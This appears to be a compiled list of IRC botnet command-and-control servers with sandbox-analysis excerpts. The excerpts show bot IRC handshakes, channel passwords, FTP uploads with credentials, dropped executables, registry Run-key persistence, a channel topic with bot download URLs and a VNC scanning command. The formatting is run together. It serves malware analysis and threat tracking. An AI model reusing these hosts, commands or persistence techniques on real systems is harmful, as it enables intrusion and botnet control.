pwnbot.no-ip.biz

Remote Host Port Number24.33.149.209 6667 NICK n-023721USER pibkwl 0 0 :n-023721USERHOST n-023721MODE n-023721 -x+BJOIN #bots password Memory Modifications * There was a new process created in the system: Process Name Process Filename Main Module Sizecuiham.exe %System%cuiham.exe 503 808 bytes * The following ports were open in the system: Port Protocol Process113 TCP cuiham.exe (%System%cuiham.exe)1054 TCP

213.202.225.65

Remote Host Port Number213.202.225.65 21213.202.225.65 39105 USER tilka_02 * There was an outbound traffic produced on port 21: 00000000 | 5041 5353 2067 6174 6865 7267 6174 6865 | PASS gathergathe00000010 | 7232 0D0A 5459 5045 2049 0D0A 5041 5356 | r2..TYPE I..PASV00000020 | 0D0A 5354 4F52 2032 3030 3930 3932 3830 | ..STOR 20090928000000030

Mouse’s big net (92.240.234.164)

Remote Host Port Number92.240.234.164 3305 NICK P|dq8nknlqvUSER uvtxqixi5 * 0 :USA|XP|056USERHOST P|dq8nknlqvMODE P|dq8nknlqvJOIN #mm RSAPRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0ys0/7/xwG5K1ha85306R4h2/YHwTF/PxQdA067AvB/I3dvk159vvk//p1d3/tEsA/0b7FNk0cuplp14Otlj1MT7lW/KzwsA.a1HAf.kONYx/OYWVs.Yp/.p/ There was an outbound traffic produced on port 3305:00000000 | 5041 5353 2073 6563 7265 7470 6173 730D | PASS secretpass.00000010 | 0A | . * The following ports were open in the system: Port Protocol Process69 UDP

Server : S.W.A.T [Crew]

Remote Host Port Number82.146.51.144 51987 NICK XP|00|USA|SP2|6792USER kdqrs 0 0 :XP|00|USA|SP2|6792JOIN #HaloUSERHOST XP|00|USA|SP2|6792MODE XP|00|USA|SP2|6792 +x+iBPONG :S.W.A.T * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1051 TCP msconfig.exe (%System%msconfig.exe) Registry Modifications * The following Registry Keys were created: o [pathname with a string SHARE]MSConfig o [pathname with a string SHARE]services

norks.org

Remote Host Port Number83.68.16.6 5190 USER biuokq biuokq biuokq :tfkizfeohdcyrwyaNICK gkXleVtgMODE gkXleVtg +xiJOIN #las6USERHOST gkXleVtgMODE #las6 +smntu Server :norks.org [2.9/hybrid-6.3] Server: Your host is localhost, running version 2.9/hybrid-6.3Created : Thu Dec 6 2001 at 11:52:49 GMTUserModes : biklmnopstve Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Network Firewall = “%System%firewall.exe”

87.118.89.49

nice trick to hide ircd proces lol Server: *Your IRC Client did not support a password. Please type /QUOTE PASS yourpassword to connect.Server Statistics:Server psyBNC.1 Remote Host Port Number87.118.89.49 6669 NICK USA[XP|SP2]00[L]369173USER bthecmdi 0 0 :USA[XP|SP2]00[L]369173JOIN #asc# asdrenyUSERHOST USA[XP|SP2]00[L]369173MODE USA[XP|SP2]00[L]369173 -xt+iBPRIVMSG #easc# :7Patcher7 Ip Fixed hErE! Registry Modifications * The following Registry Keys were created:

irc.deathwyrm.net

irc.deathwyrm.net:6667 NICK XP|00|USA|SP2|2111USER sslrej 0 0 :XP|00|USA|SP2|2111USERHOST XP|00|USA|SP2|2111MODE XP|00|USA|SP2|2111 +x+iBJOIN #BeaverrNOTICE XP|00|USA|SP2|2111 :.VERSION DBoT Modded v12.4.NICK XP|00|USA|SP2|9563USER vqff 0 0 :XP|00|USA|SP2|9563USERHOST XP|00|USA|SP2|9563MODE XP|00|USA|SP2|9563 +x+iBNICK XP|00|USA|SP2|0672USER ocfa 0 0 :XP|00|USA|SP2|0672USERHOST XP|00|USA|SP2|0672MODE XP|00|USA|SP2|0672 +x+iBNICK XP|00|USA|SP2|4195USER prfjg 0 0 :XP|00|USA|SP2|4195USERHOST XP|00|USA|SP2|4195MODE XP|00|USA|SP2|4195 +x+iB

serv01.colo.owned.hu

Remote Host Port Numberserv01.colo.owned.hu 31090serv01.colo.owned.hu 31093 NICK computernameUSER aezneimj UNIX UNIX :usernameJOIN #live# monkeybreedNICK NEW-computernameUSER oupfdcsd UNIX UNIX :username Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREWindowsLive o HKEY_CURRENT_USERSoftwareWinRAR SFX * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Live = “%AppData%WindowsLive.exe” so that WindowsLive.exe runs every time Windows starts

xxx.silverlords.org

200.206.171.99:6667Nick: [00|AUT|XP|SP3]-4062Username: arbpdJoined Channel: #cycloneChannel Topic for Channel #conexao: “^C3,1.:^C9:[^C8 Nxe3o tendo como obrigatoriedade vocxea permanecer neste canal este canal e apenas para monitoramento e protexe7xe3o ^C4ANTI-ATAQUES^C8 cloneX entres outros. ^C9]:^C3:.^O”Channel Topic for Channel #cyclone: “^C4 http://201.134.249.164/intranet/bot01.exe http://201.134.249.164/intranet/bot02.exe ^O”Private Message to Channel #cyclone: “.find vnc-5900 100 5 0 189.x.x.x”Private Message to Channel #cyclone: “bot*”Private Message

irc.sexnet.org

* To mark the presence in the system, the following Mutex object was created: o Tr0gBot * The following ports were open in the system: Port Protocol Process113 TCP izsojy.exe (%System%izsojy.exe)1073 TCP izsojy.exe (%System%izsojy.exe)1074 TCP ftylsv.exe (%System%ftylsv.exe)1075 TCP izsojy.exe (%System%izsojy.exe)1076 TCP izsojy.exe (%System%izsojy.exe) PASS 073824050NICK n-635564USER kejcfs 0 0 :n-635564USERHOST n-635564MODE n-635564 -x+BJOIN #sexhot 073824050NOTICE